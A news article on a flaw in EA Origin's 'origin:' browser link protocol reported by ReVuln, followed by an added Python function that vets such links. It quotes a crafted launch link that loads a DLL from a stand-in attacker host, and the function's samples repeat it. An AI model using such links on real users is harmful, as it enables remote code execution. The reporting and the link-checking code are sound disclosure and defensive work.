A security flaw has surfaced in the browser protocol Origin uses to launch games through custom links using the "origin:" structure. As Ars Technica reports, research group ReVuln demonstrates how a malicious program can be executed via a modified Origin link masquerading as a game launch.
Normally, an Origin game calls for an "origin://LaunchGame/[GameID]" command when launching through a browser. According to ReVuln, attackers can simply modify this path to something like "origin://LaunchGame/[GameID]?CommandParams= -openautomate ATTACKER_IPevil.dll" to toxify the command, causing it to run a foreign DLL.
In addition to a paper on its findings, ReVuln also recorded a brief video of the exploit in action.
Responding to Ars, an EA rep said, "Our team is constantly investigating hypotheticals like this one as we continually update our security infrastructure."
The issue isn't exclusive to Origin—other programs using this kind of protocol are vulnerable, including Steam, which the same group demonstrated attacks on in October.
The problem is in the same family as any other phishing attack launched from malformed links or trojan email attachments. In the end, the safest course is to never click on un-vetted links containing funky-looking parameters, be it an Origin launch or otherwise. Or, in the words of Dr. Breen: "Be wise. Be safe. Be aware."
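Vetting a link of the kind described above can be automated. The following is an added example, not code from ReVuln, EA or the original article: it accepts only the plain "origin://LaunchGame/[GameID]" form and reports anything extra, such as the CommandParams parameter. The function name, the game-ID pattern and the sample ID 12345 are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Assumption: game IDs are short tokens of letters, digits and : _ . -
GAME_ID = re.compile(r"[A-Za-z0-9:_.-]{1,64}")


def vet_origin_link(link):
    """Return a list of findings; an empty list means a plain game launch."""
    parts = urlsplit(link.strip())
    if parts.scheme != "origin":  # urlsplit lowercases the scheme
        return ["not an origin: link"]

    findings = []
    # The command sits where a hostname would be in an http URL.
    if parts.netloc.lower() != "launchgame":
        findings.append(f"unexpected command {parts.netloc!r}")

    # Decode first, so a percent-encoded '?' or space cannot hide in the ID.
    game_id = unquote(parts.path).strip("/")
    if not GAME_ID.fullmatch(game_id):
        findings.append(f"malformed game id {game_id!r}")

    # A normal launch link carries no query string at all.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        findings.append(f"extra parameter {name}={value!r}")
        if name.lower() == "commandparams":
            findings.append("CommandParams present (used by the modified link)")
        if re.search(r"\.dll\b", value, re.IGNORECASE):
            findings.append("parameter value references a DLL")

    if parts.fragment:
        findings.append("unexpected fragment")
    return findings


if __name__ == "__main__":
    # Constructed samples; 12345 stands in for [GameID].
    samples = [
        "origin://LaunchGame/12345",
        "origin://LaunchGame/12345?CommandParams= -openautomate ATTACKER_IPevil.dll",
        "ORIGIN://launchgame/12345?commandparams=%2Dopenautomate%20x.DLL",
    ]
    for s in samples:
        print(s, "->", vet_origin_link(s) or "ok")
```

A mail gateway or chat filter could run such a check on origin: links before they are rendered as clickable.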